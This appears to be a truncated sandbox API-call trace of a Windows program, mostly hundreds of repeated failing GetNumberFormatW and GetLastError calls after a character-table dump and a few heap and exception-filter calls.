¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x95\x83Xhäþ\x18", lpUsedDefaultChar=0x0) returned 256 [0025.567] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x408ded) returned 0x0 [0025.568] RtlSizeHeap (HeapHandle=0x4f10000, Flags=0x0, MemoryPointer=0x4f25518) returned 0x80 [0025.568] RtlSizeHeap (HeapHandle=0x4f10000, Flags=0x0, MemoryPointer=0x4f25518) returned 0x80 [0025.568] RtlSizeHeap (HeapHandle=0x4f10000, Flags=0x0, MemoryPointer=0x4f25518) returned 0x80 [0025.569] RtlSizeHeap (HeapHandle=0x4f10000, Flags=0x0, MemoryPointer=0x4f25518) returned 0x80 [0025.569] lstrlenA (lpString="") returned 0 [0025.569] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.571] GetLastError () returned 0x57 [0025.571] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.571] GetLastError () returned 0x57 [0025.571] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.571] GetLastError () returned 0x57 [0025.571] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.571] GetLastError () returned 0x57 [0025.571] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.571] GetLastError () returned 0x57 [0025.571] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.571] GetLastError () returned 0x57 [0025.571] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.571] GetLastError () returned 0x57 [0025.571] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.571] GetLastError () returned 0x57 [0025.571] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.571] GetLastError () returned 0x57 [0025.571] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.571] GetLastError () returned 0x57 [0025.571] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.571] GetLastError () returned 0x57 [0025.571] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.571] GetLastError () returned 0x57 [0025.571] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.571] GetLastError () returned 0x57 [0025.571] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.571] GetLastError () returned 0x57 [0025.571] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.571] GetLastError () returned 0x57 [0025.571] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.571] GetLastError () returned 0x57 [0025.571] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.571] GetLastError () returned 0x57 [0025.571] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.571] GetLastError () returned 0x57 [0025.571] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.571] GetLastError () returned 0x57 [0025.571] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.572] GetLastError () returned 0x57 [0025.572] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.572] GetLastError () returned 0x57 [0025.572] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.572] GetLastError () returned 0x57 [0025.572] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.572] GetLastError () returned 0x57 [0025.572] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.572] GetLastError () returned 0x57 [0025.572] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.572] GetLastError () returned 0x57 [0025.572] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.572] GetLastError () returned 0x57 [0025.572] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.572] GetLastError () returned 0x57 [0025.572] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.572] GetLastError () returned 0x57 [0025.572] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.572] GetLastError () returned 0x57 [0025.572] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.572] GetLastError () returned 0x57 [0025.572] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.572] GetLastError () returned 0x57 [0025.572] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.572] GetLastError () returned 0x57 [0025.572] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.572] GetLastError () returned 0x57 [0025.572] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.572] GetLastError () returned 0x57 [0025.572] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.572] GetLastError () returned 0x57 [0025.572] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.572] GetLastError () returned 0x57 [0025.572] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.572] GetLastError () returned 0x57 [0025.572] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.572] GetLastError () returned 0x57 [0025.572] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.572] GetLastError () returned 0x57 [0025.572] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.572] GetLastError () returned 0x57 [0025.572] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.573] GetLastError () returned 0x57 [0025.573] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.573] GetLastError () returned 0x57 [0025.573] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.573] GetLastError () returned 0x57 [0025.573] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.573] GetLastError () returned 0x57 [0025.573] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.573] GetLastError () returned 0x57 [0025.573] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.573] GetLastError () returned 0x57 [0025.573] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.573] GetLastError () returned 0x57 [0025.573] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.573] GetLastError () returned 0x57 [0025.573] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.573] GetLastError () returned 0x57 [0025.573] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.573] GetLastError () returned 0x57 [0025.573] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.573] GetLastError () returned 0x57 [0025.573] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.573] GetLastError () returned 0x57 [0025.573] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.573] GetLastError () returned 0x57 [0025.573] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.573] GetLastError () returned 0x57 [0025.573] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.573] GetLastError () returned 0x57 [0025.573] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.573] GetLastError () returned 0x57 [0025.573] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.573] GetLastError () returned 0x57 [0025.573] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.573] GetLastError () returned 0x57 [0025.573] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.573] GetLastError () returned 0x57 [0025.573] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.573] GetLastError () returned 0x57 [0025.573] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.573] GetLastError () returned 0x57 [0025.573] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.574] GetLastError () returned 0x57 [0025.574] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.574] GetLastError () returned 0x57 [0025.574] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.574] GetLastError () returned 0x57 [0025.574] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.574] GetLastError () returned 0x57 [0025.574] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.574] GetLastError () returned 0x57 [0025.574] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.574] GetLastError () returned 0x57 [0025.574] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.574] GetLastError () returned 0x57 [0025.574] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.574] GetLastError () returned 0x57 [0025.574] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.574] GetLastError () returned 0x57 [0025.574] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.574] GetLastError () returned 0x57 [0025.574] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.574] GetLastError () returned 0x57 [0025.574] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.574] GetLastError () returned 0x57 [0025.574] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.574] GetLastError () returned 0x57 [0025.574] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.574] GetLastError () returned 0x57 [0025.574] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.574] GetLastError () returned 0x57 [0025.574] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.574] GetLastError () returned 0x57 [0025.574] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.574] GetLastError () returned 0x57 [0025.574] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.574] GetLastError () returned 0x57 [0025.574] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.574] GetLastError () returned 0x57 [0025.574] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.574] GetLastError () returned 0x57 [0025.574] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.574] GetLastError () returned 0x57 [0025.574] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.575] GetLastError () returned 0x57 [0025.575] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.575] GetLastError () returned 0x57 [0025.575] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.575] GetLastError () returned 0x57 [0025.575] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.575] GetLastError () returned 0x57 [0025.575] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.575] GetLastError () returned 0x57 [0025.575] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.575] GetLastError () returned 0x57 [0025.575] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.575] GetLastError () returned 0x57 [0025.575] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.575] GetLastError () returned 0x57 [0025.575] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.575] GetLastError () returned 0x57 [0025.575] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.575] GetLastError () returned 0x57 [0025.575] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.575] GetLastError () returned 0x57 [0025.575] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.575] GetLastError () returned 0x57 [0025.575] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.575] GetLastError () returned 0x57 [0025.575] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.575] GetLastError () returned 0x57 [0025.575] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.575] GetLastError () returned 0x57 [0025.575] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.575] GetLastError () returned 0x57 [0025.575] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.575] GetLastError () returned 0x57 [0025.575] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.575] GetLastError () returned 0x57 [0025.575] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.575] GetLastError () returned 0x57 [0025.575] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.575] GetLastError () returned 0x57 [0025.575] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.575] GetLastError () returned 0x57 [0025.577] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.577] GetLastError () returned 0x57 [0025.577] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.577] GetLastError () returned 0x57 [0025.577] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.577] GetLastError () returned 0x57 [0025.577] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.577] GetLastError () returned 0x57 [0025.577] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.577] GetLastError () returned 0x57 [0025.577] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.577] GetLastError () returned 0x57 [0025.577] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.577] GetLastError () returned 0x57 [0025.577] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.577] GetLastError () returned 0x57 [0025.577] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.577] GetLastError () returned 0x57 [0025.577] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.577] GetLastError () returned 0x57 [0025.577] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.577] GetLastError () returned 0x57 [0025.577] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.577] GetLastError () returned 0x57 [0025.577] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.577] GetLastError () returned 0x57 [0025.577] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.577] GetLastError () returned 0x57 [0025.577] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.577] GetLastError () returned 0x57 [0025.577] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.577] GetLastError () returned 0x57 [0025.577] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.577] GetLastError () returned 0x57 [0025.577] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.577] GetLastError () returned 0x57 [0025.578] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.578] GetLastError () returned 0x57 [0025.578] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 | out: lpNumberStr=0x0) returned 0 [0025.578] GetLastError () returned 0x57 [0025.578] GetNumberFormatW (in: Locale=0x0, dwFlags=0x0, lpValue=0x0, lpFormat=0x0, lpNumberStr=0x0, cchNumber=0 